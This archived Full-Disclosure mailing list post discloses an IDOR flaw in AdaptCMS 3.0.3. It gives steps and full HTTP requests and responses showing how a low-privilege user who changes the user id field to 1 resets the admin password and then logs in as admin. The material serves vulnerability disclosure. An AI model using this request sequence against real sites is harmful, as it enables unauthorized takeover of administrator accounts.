| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1Y2p4Nh0PJ6=qWYzZ=i=LLbjs6qJ6weJfwAc=RGxa=NgQ@mail.gmail.com> Date: Sun, 1 Jun 2025 16:09:23 +0100 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] IDOR "Change Password" Functionality - adaptcmsv3.0.3 # Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR "Change Password" Functionality #1: Steps to Reproduce: 1. Login as user with low privilege and visit profile page 2. Select "Edit Your Profile" and click "Submit" 3. Trap the HTTP POST request 4. Set "data[User][password]" and "data[User][password_confirm]" values "Passw0rd!" 5. Set "data[User][id]" value to "1" 6. This would change the password of the "admin" account // HTTP POST request changing password POST /adaptcms/users/edit HTTP/1.1 Host: 192.168.58.131 Content-Length: 2090 Cache-Control: max-age=0 Accept-Language: en-GB,en;q=0.9 Origin: http://192.168.58.131 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDvhxmc78yz9KfFbn Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 [...] [...] 4d63437ebea6a2ef6648b29cc1c43ea70600295a ------WebKitFormBoundaryDvhxmc78yz9KfFbn Content-Disposition: form-data; name="data[User][password]" password ------WebKitFormBoundaryDvhxmc78yz9KfFbn Content-Disposition: form-data; name="data[User][password_confirm]" password ------WebKitFormBoundaryDvhxmc78yz9KfFbn Content-Disposition: form-data; name="data[User][email]" privesc-test@...t.test ------WebKitFormBoundaryDvhxmc78yz9KfFbn Content-Disposition: form-data; name="data[User][id]" 1 ------WebKitFormBoundaryDvhxmc78yz9KfFbn [...] // HTTP Response HTTP/1.1 200 OK Date: Fri, 30 May 2025 19:56:17 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Content-Length: 13925 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 // HTTP POST request logging in with admin account POST /adaptcms/login HTTP/1.1 Host: 192.168.58.131 Content-Length: 262 Cache-Control: max-age=0 Accept-Language: en-GB,en;q=0.9 Origin: http://192.168.58.131 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 [...] _method=POST&data[_Token][key]=dc18f92e4d0b810c603f45f2189b220de543a972&data[User][username]=admin&data[User][password]=Passw0rd!&data[_Token][fields]=5ba74a784fe0258a12c30194ef6a09b97a86bb1d%3A&data[_Token][unlocked]= // HTTP Response HTTP/1.1 302 Found Date: Fri, 30 May 2025 19:56:33 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Set-Cookie: adaptcms=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: adaptcms=2aaosqqksob20a98viieaq8j44; expires=Mon, 02-Jun-2025 19:56:33 GMT; Max-Age=259200; path=/; HttpOnly Location: http://192.168.58.131/adaptcms/admin Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists